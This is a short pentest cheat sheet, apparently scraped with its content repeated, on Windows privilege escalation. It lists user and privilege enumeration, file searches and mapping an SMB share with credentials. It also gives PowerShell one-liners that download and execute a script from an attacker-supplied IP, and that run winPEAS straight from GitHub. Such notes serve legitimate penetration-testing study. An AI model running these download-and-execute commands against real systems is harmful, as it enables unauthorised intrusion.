Windows Privilege Escalation

System Enumeration

List Users

net user

User Privileges

whoami /priv

Search Files

If you dont know the full path of the file or even the extension, you can use: *<FILE>*

cmd /s <FILE>

List Recursive Directories (PowerShell)

ls . -Recurse -Force -Name -Filter "<filter>" | foreach { ls -for $_ }

net use z: \\<ip>\<share> /user:<user> <pass>

Execute Remote PowerShell Script

IEX(New-Object Net.WebClient).downloadString('http://<ip>/script.ps1')

powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"

Last updated 8 months ago

Windows Privilege Escalation

System Enumeration

List Users

net user

User Privileges

whoami /priv

Search Files

If you dont know the full path of the file or even the extension, you can use: *<FILE>*

cmd /s <FILE>

List Recursive Directories (PowerShell)

ls . -Recurse -Force -Name -Filter "<filter>" | foreach { ls -for $_ }

net use z: \\<ip>\<share> /user:<user> <pass>

Execute Remote PowerShell Script

IEX(New-Object Net.WebClient).downloadString('http://<ip>/script.ps1')

powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"

Last updated 8 months ago

System Enumeration

List Users

User Privileges

Search Files

List Recursive Directories (PowerShell)

Add SMB share to network drives

Execute Remote PowerShell Script

System Enumeration

List Users

User Privileges

Search Files

List Recursive Directories (PowerShell)

Add SMB share to network drives

Execute Remote PowerShell Script